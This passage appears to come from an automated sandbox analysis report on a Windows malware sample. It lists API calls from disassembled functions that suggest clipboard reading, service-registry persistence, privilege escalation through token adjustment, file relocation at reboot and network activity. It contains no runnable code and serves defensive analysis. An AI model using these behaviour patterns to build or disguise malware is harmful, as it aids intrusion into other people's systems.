                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 100013FB
                                                                    • CloseClipboard.USER32 ref: 10001401
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Clipboard$Globalstrlen$CloseDataH_prologLockOpenUnlock
                                                                    • String ID:
                                                                    • API String ID: 2744405493-0
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(10012D70,00000000,?,?,?,?,?,0040EB9D), ref: 0040EDE4
                                                                    • GetProcAddress.KERNEL32(00000000,10012D60), ref: 0040EDF3
                                                                    • LoadLibraryA.KERNEL32(00000050,?,?,?,0040EB9D), ref: 0040EE2D
                                                                    • realloc.MSVCRT ref: 0040EE4C
                                                                    • GetProcAddress.KERNEL32(?,?), ref: 0040EEA5
                                                                    • FreeLibrary.KERNEL32(?,0040EB9D), ref: 0040EEE7
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Library$AddressLoadProc$Freerealloc
                                                                    • String ID:
                                                                    • API String ID: 343009874-0
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseHandle_mbscpygethostbynameinet_addrinet_ntoamemcpy
                                                                    • String ID:
                                                                    • API String ID: 2639091341-0
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseHandle_mbscpygethostbynameinet_addrinet_ntoamemcpy
                                                                    • String ID:
                                                                    • API String ID: 2639091341-0
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseHandle_mbscpygethostbynameinet_addrinet_ntoamemcpy
                                                                    • String ID:
                                                                    • API String ID: 2639091341-0
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseHandle_mbscpygethostbynameinet_addrinet_ntoamemcpy
                                                                    • String ID:
                                                                    • API String ID: 2639091341-0
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseHandle_mbscpygethostbynameinet_addrinet_ntoamemcpy
                                                                    • String ID:
                                                                    • API String ID: 2639091341-0
                                                                    • Opcode ID: b5ec76156d1e95e976921df7b4dc76adbae61f63f9323eff8a4a8a7ab284d421
                                                                    • Instruction ID: 0ef99c5fc0bafe760d386d7421f25e0da4223d45fd07e147cbc2e89a7ef28672
                                                                    • Opcode Fuzzy Hash: b5ec76156d1e95e976921df7b4dc76adbae61f63f9323eff8a4a8a7ab284d421
                                                                    • Instruction Fuzzy Hash: 03114CB591425DBFEB009FA4DCC4CAB3BACEB443A4715817AF908D72A1DB74DD808B64
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseHandle_mbscpygethostbynameinet_addrinet_ntoamemcpy
                                                                    • String ID:
                                                                    • API String ID: 2639091341-0
                                                                    • Opcode ID: 8114b808eb6457c2da1cba9f100ab21ddf80d99eb743dfd380f1022a9c745f4c
                                                                    • Instruction ID: ac6a92a81bd9858db20a7d40003e8a81ff00761e9a83ea72e867e2fc6fe511bc
                                                                    • Opcode Fuzzy Hash: 8114b808eb6457c2da1cba9f100ab21ddf80d99eb743dfd380f1022a9c745f4c
                                                                    • Instruction Fuzzy Hash: 77114CB550421DBFEB009F64DCC4CAB3BACEB443A47158436FA08D72A2D734DD808BA4
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseHandle_mbscpygethostbynameinet_addrinet_ntoamemcpy
                                                                    • String ID:
                                                                    • API String ID: 2639091341-0
                                                                    • Opcode ID: 6a8e787f510737941c8ac031b9e449823c5f295378c209042514e7afa1060de8
                                                                    • Instruction ID: 56c9bf6ebd49b2cfcf1af41c4fbd591865a9760268c6c2c5cd54063d8e8c775a
                                                                    • Opcode Fuzzy Hash: 6a8e787f510737941c8ac031b9e449823c5f295378c209042514e7afa1060de8
                                                                    • Instruction Fuzzy Hash: 25114CB551021ABFEB009FA4DCC4CAB7BACEB443A4715813AF909D7261DB34DD808BA4
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _strupr$MessageSendVisibleWindowlstrlenstrstr
                                                                    • String ID:
                                                                    • API String ID: 850376632-0
                                                                    • Opcode ID: 41c15ac8a034a4f988a901adb0276dad7d493b2f6438a95bce7c2869373d5829
                                                                    • Instruction ID: 0b6569184308d5092b71901e17deb8d11e374f996cf725eb53732de4d7b5148e
                                                                    • Opcode Fuzzy Hash: 41c15ac8a034a4f988a901adb0276dad7d493b2f6438a95bce7c2869373d5829
                                                                    • Instruction Fuzzy Hash: 3D01757260022DAEFB109BA4DC49F9A7BACEB043C5F10847AEB05F5094EF71AA458B54
                                                                    APIs
                                                                    • GetModuleFileNameA.KERNEL32(?,00000104), ref: 00410F47
                                                                    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00410F55
                                                                    • GetTickCount.KERNEL32 ref: 00410F5B
                                                                    • wsprintfA.USER32 ref: 00410F75
                                                                    • MoveFileA.KERNEL32(?,?), ref: 00410F8C
                                                                    • MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 00410F9D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File$Move$CountDirectoryModuleNameSystemTickwsprintf
                                                                    • String ID:
                                                                    • API String ID: 830686190-0
                                                                    • Opcode ID: 000ff4eb096c81d91c01ada470acf548624416b1241f4089cb36c338762840f1
                                                                    • Instruction ID: 9f06803c1ffaaaa31e9d9007a62f372198ec7d6cfd6c9242bac5ba9a813fd8f0
                                                                    • Opcode Fuzzy Hash: 000ff4eb096c81d91c01ada470acf548624416b1241f4089cb36c338762840f1
                                                                    • Instruction Fuzzy Hash: 50F091B680022CEBEB109B94CD8DED7777CEB19341F400192F755D2065D674AA94CFA4
                                                                    APIs
                                                                    • VirtualAlloc.KERNEL32(00000004,?,00002000,00000004,?,?,?,?,?,?,10004EE2,?), ref: 10006AAC
                                                                    • VirtualAlloc.KERNEL32(00000000,?,00002000,00000004,?,?,?,?,?,?,10004EE2,?), ref: 10006ABC
                                                                    • GetProcessHeap.KERNEL32(00000000,00000014,?,?,?,?,?,?,10004EE2,?), ref: 10006ACD
                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,10004EE2,?), ref: 10006AD4
                                                                    • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,?,?,?,?,10004EE2,?), ref: 10006AF8
                                                                    • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,?,?,?,?,10004EE2,?), ref: 10006B07
                                                                    • memcpy.MSVCRT(00000000,?,?,?,?,?,?,?,?,10004EE2,?), ref: 10006B18
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Alloc$Virtual$Heap$Processmemcpy
                                                                    • String ID:
                                                                    • API String ID: 2335822491-0
                                                                    • Opcode ID: fda733b7b8d0eefcb2523fafa16eeaad609332357a054895f0cb226edc32ce91
                                                                    • Instruction ID: 9749948cec9ded70f1cb0785933e75aede6f1033f69415ccdb1ca8143126ce73
                                                                    • Opcode Fuzzy Hash: fda733b7b8d0eefcb2523fafa16eeaad609332357a054895f0cb226edc32ce91
                                                                    • Instruction Fuzzy Hash: 503148B1600305BFE714DBA9CC85F6A7BA9EF487A4F204429F605D7285DBB0E940CBA4
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: strlen$CreateDirectory_access
                                                                    • String ID: Rsjshd fzfgkqcm
                                                                    • API String ID: 2692904705-3753134293
                                                                    • Opcode ID: 954fdeec0aa1be0a0496a17a2e9b9ec5d6852a07f1792e650cf2c758b9485b67
                                                                    • Instruction ID: e75c7dfe0287a2a9ee950ba91ede74e14394efcbff4014e2d18e1f21b8cfdc79
                                                                    • Opcode Fuzzy Hash: 954fdeec0aa1be0a0496a17a2e9b9ec5d6852a07f1792e650cf2c758b9485b67
                                                                    • Instruction Fuzzy Hash: 2401D6F78002687BFB20D3B4DC45FCB77ACEB86791F1101A6E781A2089D6B4A6C58795
                                                                    APIs
                                                                    • strcpy.MSVCRT(00000000,SYSTEM\CurrentControlSet\Services\,75921760), ref: 10009E40
                                                                    • strcat.MSVCRT(00000000,Rsjshd fzfgkqcm,00000000,SYSTEM\CurrentControlSet\Services\,75921760), ref: 10009E51
                                                                    • RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,000F003F,100096BB,?,?,?,75921760), ref: 10009E70
                                                                    Strings
                                                                    • SYSTEM\CurrentControlSet\Services\, xrefs: 10009E3A
                                                                    • Rsjshd fzfgkqcm, xrefs: 10009E4B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Openstrcatstrcpy
                                                                    • String ID: Rsjshd fzfgkqcm$SYSTEM\CurrentControlSet\Services\
                                                                    • API String ID: 883322207-3836574047
                                                                    • Opcode ID: 44a42bc4adcd3ea2217754a50fa90f40591461bb4abc7fb8ba3c25a47b8a0cf6
                                                                    • Instruction ID: bb402566a885a102546ad197f213bba67bf5148c6e8ca3191bc1c33e99d45995
                                                                    • Opcode Fuzzy Hash: 44a42bc4adcd3ea2217754a50fa90f40591461bb4abc7fb8ba3c25a47b8a0cf6
                                                                    • Instruction Fuzzy Hash: FAF08276D0825C7AEB50D6A4CC4AFE977BCD714700F1005F5B385F10C1EAF0AAC98A51
                                                                    APIs
                                                                      • Part of subcall function 0040F177: memset.MSVCRT ref: 0040F1A3
                                                                      • Part of subcall function 0040F177: memset.MSVCRT ref: 0040F1B5
                                                                      • Part of subcall function 0040F177: wsprintfA.USER32 ref: 0040F25B
                                                                    • gethostname.WS2_32(?,?), ref: 0040F2C8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: memset$gethostnamewsprintf
                                                                    • String ID: H$o$s$t
                                                                    • API String ID: 589013843-2997942591
                                                                    • Opcode ID: ff66edb42a3f77dad9a39df39677ec2130cdafcac361e2011161291dac322d02
                                                                    • Instruction ID: 92fdbd7fed3dffd60e53f6a2c6440f77573962f1768d4b625b8599ba06d74dce
                                                                    • Opcode Fuzzy Hash: ff66edb42a3f77dad9a39df39677ec2130cdafcac361e2011161291dac322d02
                                                                    • Instruction Fuzzy Hash: 1EF0F62180428CBAEB029B54CC04EEF7F79DB42694F0440A8F80066141D3795614C7B6
                                                                    APIs
                                                                    • LoadLibraryW.KERNEL32(ntdll.dll,75921760,75A78400,10009673,?,?,?), ref: 10007B2B
                                                                    • GetProcAddress.KERNEL32(00000000,RtlGetNtVersionNumbers), ref: 10007B3D
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 10007B5F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Library$AddressFreeLoadProc
                                                                    • String ID: RtlGetNtVersionNumbers$ntdll.dll
                                                                    • API String ID: 145871493-1263206204
                                                                    • Opcode ID: affd025d5d6dbe5042d11633fd32b0460159a7a91076e1ca695f65ed61910acc
                                                                    • Instruction ID: c04653ab4968678f864b0174d2dc83fc2ab912d403c086209aa955114e2d99bb
                                                                    • Opcode Fuzzy Hash: affd025d5d6dbe5042d11633fd32b0460159a7a91076e1ca695f65ed61910acc
                                                                    • Instruction Fuzzy Hash: 04E09232100621A6E6229B65BC48E9B7FB4EFC1AD1B018018FA45A6114D739C845C6A2
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: fclosefopenfprintf
                                                                    • String ID: %s$C:\2.txt
                                                                    • API String ID: 167258513-4237254449
                                                                    • Opcode ID: 41ea3f754f816433651150daba981647f00d6c72f804a91c61443fda2dd50815
                                                                    • Instruction ID: 2b131c061d7e3b177375d62e6b9ba3b51481e7bc0515796d0beacfd8a309904a
                                                                    • Opcode Fuzzy Hash: 41ea3f754f816433651150daba981647f00d6c72f804a91c61443fda2dd50815
                                                                    • Instruction Fuzzy Hash: 69D012368095326BA651B7E97C08CC73E54DF0B2F57024665F710B51AADB30859246D1
                                                                    APIs
                                                                    • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000), ref: 004109ED
                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00410A06
                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00410A0E
                                                                    • WriteFile.KERNEL32(?,?,00000400,?,00000000), ref: 00410A84
                                                                    • CloseHandle.KERNEL32(?), ref: 00410A95
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File$CloseCreateHandlePointerSizeWrite
                                                                    • String ID:
                                                                    • API String ID: 1886887421-0
                                                                    • Opcode ID: 7968883ead0f57cd96c7908dc12ccf6293502afa04708cabb66c95fa5f9433b7
                                                                    • Instruction ID: 39dba3b7ce34f3bf209352e9e1a2eaad2d461a449b25026f79dd16f7dc3d93d4
                                                                    • Opcode Fuzzy Hash: 7968883ead0f57cd96c7908dc12ccf6293502afa04708cabb66c95fa5f9433b7
                                                                    • Instruction Fuzzy Hash: 7B21A475900218FBEB119FA8CCC4AEEBB79EF45784F10816AFB0566281D7744E868B58
                                                                    APIs
                                                                    • strlen.MSVCRT ref: 0041059C
                                                                    • malloc.MSVCRT ref: 004105AE
                                                                    • memcpy.MSVCRT(00000000,?,00000001), ref: 004105BB
                                                                    • strrchr.MSVCRT ref: 004105C3
                                                                    • wsprintfA.USER32 ref: 004105F6
                                                                      • Part of subcall function 00412479: GetFileAttributesA.KERNEL32(00000001,0040DB7C,00000001), ref: 0041247D
                                                                      • Part of subcall function 00412479: GetLastError.KERNEL32 ref: 00412488
                                                                      • Part of subcall function 004103FC: memset.MSVCRT ref: 0041041B
                                                                      • Part of subcall function 004103FC: strrchr.MSVCRT ref: 00410425
                                                                      • Part of subcall function 004103FC: RegOpenKeyExA.ADVAPI32(80000000,00000000,00000000,000F003F,?), ref: 00410446
                                                                      • Part of subcall function 004103FC: memset.MSVCRT ref: 00410480
                                                                      • Part of subcall function 004103FC: wsprintfA.USER32 ref: 00410498
                                                                      • Part of subcall function 004103FC: RegOpenKeyExA.ADVAPI32(80000000,?,00000000,000F003F,?), ref: 004104B8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Openmemsetstrrchrwsprintf$AttributesErrorFileLastmallocmemcpystrlen
                                                                    • String ID:
                                                                    • API String ID: 2582628008-0
                                                                    • Opcode ID: ec38fed40bc9abba7115ecd7242f6639c22469a6be9d5e5c0d9e3b78c3b36217
                                                                    • Instruction ID: 33f8f4262918b45b5eb9ab49494563c6aff08f9c386b3316b5790c0d6372acfd
                                                                    • Opcode Fuzzy Hash: ec38fed40bc9abba7115ecd7242f6639c22469a6be9d5e5c0d9e3b78c3b36217
                                                                    • Instruction Fuzzy Hash: E311E7735403283AEB2097A59C8DFEB7B6CDF44364F140067F604E5092EAF89AD586E8
                                                                    APIs
                                                                    • FreeLibrary.KERNEL32(?,00000000,?,?,0040EBCB,00000000,?,?,?,0040CF2E,?), ref: 0040EFEF
                                                                    • free.MSVCRT ref: 0040EFFE
                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0040EBCB,00000000,?,?,?,0040CF2E,?), ref: 0040F014
                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,0040EBCB,00000000,?,?,?,0040CF2E,?), ref: 0040F01C
                                                                    • HeapFree.KERNEL32(00000000,?,?,?,0040CF2E,?), ref: 0040F023
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Free$Heap$LibraryProcessVirtualfree
                                                                    • String ID:
                                                                    • API String ID: 831075735-0
                                                                    • Opcode ID: 8690bc687ee4ab543e37672b57c5295e6f24b52de9f907926c093cfc6f3471f6
                                                                    • Instruction ID: c08ed7c95415b138b5e32dd537fda86e062b1dc33fc70697a18b5dcb61060c27
                                                                    • Opcode Fuzzy Hash: 8690bc687ee4ab543e37672b57c5295e6f24b52de9f907926c093cfc6f3471f6
                                                                    • Instruction Fuzzy Hash: F0010572500712AFD7308FA9CCC8C57B7E9FB48365304893EF1AAA2691C778A845CB54
                                                                    APIs
                                                                    • FreeLibrary.KERNEL32(?,00000000,?,?,10006B7F,00000000,?,?,?,10004EE2,?), ref: 10006FA3
                                                                    • free.MSVCRT ref: 10006FB2
                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,10006B7F,00000000,?,?,?,10004EE2,?), ref: 10006FC8
                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,10006B7F,00000000,?,?,?,10004EE2,?), ref: 10006FD0
                                                                    • HeapFree.KERNEL32(00000000,?,?,?,10004EE2,?), ref: 10006FD7
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Free$Heap$LibraryProcessVirtualfree
                                                                    • String ID:
                                                                    • API String ID: 831075735-0
                                                                    • Opcode ID: 8690bc687ee4ab543e37672b57c5295e6f24b52de9f907926c093cfc6f3471f6
                                                                    • Instruction ID: 24648aba92ea272d6710cbe388d30b758f61883bd97b9d0bf840f2c4c6516480
                                                                    • Opcode Fuzzy Hash: 8690bc687ee4ab543e37672b57c5295e6f24b52de9f907926c093cfc6f3471f6
                                                                    • Instruction Fuzzy Hash: B30125B25007169FEB209FA8DCC8D67B7EAFB482E5321893DF1AAD3554C730A841CB50
                                                                    APIs
                                                                      • Part of subcall function 00410AA0: GetCurrentProcess.KERNEL32 ref: 00410AA6
                                                                      • Part of subcall function 00410AA0: OpenProcessToken.ADVAPI32(00000000,00000028,?), ref: 00410AB3
                                                                      • Part of subcall function 00410AA0: LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 00410B10
                                                                      • Part of subcall function 00410AA0: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00410B33
                                                                      • Part of subcall function 00410AA0: CloseHandle.KERNEL32(?), ref: 00410B3C
                                                                    • OpenProcess.KERNEL32(00000040,00000000,00000004), ref: 00410B57
                                                                    • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 00410B79
                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,?,00000000,00000000,00000003), ref: 00410B8E
                                                                    • DuplicateHandle.KERNEL32(00000000), ref: 00410B95
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00410B9E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Process$Handle$CloseCurrentOpenToken$AdjustCreateDuplicateFileLookupPrivilegePrivilegesValue
                                                                    • String ID:
                                                                    • API String ID: 3891907324-0
                                                                    • Opcode ID: fc4f47a52c505637c19de6401be215cd4926b59fd9bac807a70404101a2911aa
                                                                    • Instruction ID: 701e7183e7ade9e35f03d8965f22410fcfadc7dcd00ca8c7b6c10de28c7ac3be
                                                                    • Opcode Fuzzy Hash: fc4f47a52c505637c19de6401be215cd4926b59fd9bac807a70404101a2911aa
                                                                    • Instruction Fuzzy Hash: 72F06D71640234BAE63017A28C4EFEB3E2CDB87BF4F100215FA0AA21D1DAB45981C5B4
                                                                    APIs
                                                                      • Part of subcall function 10008A54: GetCurrentProcess.KERNEL32 ref: 10008A5A
                                                                      • Part of subcall function 10008A54: OpenProcessToken.ADVAPI32(00000000,00000028,?), ref: 10008A67
                                                                      • Part of subcall function 10008A54: LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 10008AC4
                                                                      • Part of subcall function 10008A54: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 10008AE7
                                                                      • Part of subcall function 10008A54: CloseHandle.KERNEL32(?), ref: 10008AF0
                                                                    • OpenProcess.KERNEL32(00000040,00000000,00000004), ref: 10008B0B
                                                                    • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 10008B2D
                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,?,00000000,00000000,00000003), ref: 10008B42
                                                                    • DuplicateHandle.KERNEL32(00000000), ref: 10008B49
                                                                    • CloseHandle.KERNEL32(00000000), ref: 10008B52
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Process$Handle$CloseCurrentOpenToken$AdjustCreateDuplicateFileLookupPrivilegePrivilegesValue
                                                                    • String ID:
                                                                    • API String ID: 3891907324-0
                                                                    • Opcode ID: fc4f47a52c505637c19de6401be215cd4926b59fd9bac807a70404101a2911aa
                                                                    • Instruction ID: b4c17da15a24d41c01ec6af50e3790ace5c6fe3b432938c9e68273d2ce58b678
                                                                    • Opcode Fuzzy Hash: fc4f47a52c505637c19de6401be215cd4926b59fd9bac807a70404101a2911aa
                                                                    • Instruction Fuzzy Hash: DEF06DB12012347AF62017618C8EF9B3E2CEB47AF1F100610FB0AA21D4DA609A41C6B0
                                                                    APIs
                                                                    • __EH_prolog.LIBCMT ref: 100019B9
                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 100019DC
                                                                    • CloseHandle.KERNEL32(?), ref: 100019F8
                                                                    • CloseHandle.KERNEL32(?), ref: 100019FD
                                                                    • WSACleanup.WS2_32 ref: 100019FF
                                                                      • Part of subcall function 10001E14: setsockopt.WS2_32(?,0000FFFF,00000080,10008E5C,00000004), ref: 10001E39
                                                                      • Part of subcall function 10001E14: CancelIo.KERNEL32(?), ref: 10001E42
                                                                      • Part of subcall function 10001E14: InterlockedExchange.KERNEL32(?,00000000), ref: 10001E4E
                                                                      • Part of subcall function 10001E14: closesocket.WS2_32(?), ref: 10001E57
                                                                      • Part of subcall function 10001E14: SetEvent.KERNEL32(?), ref: 10001E60
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
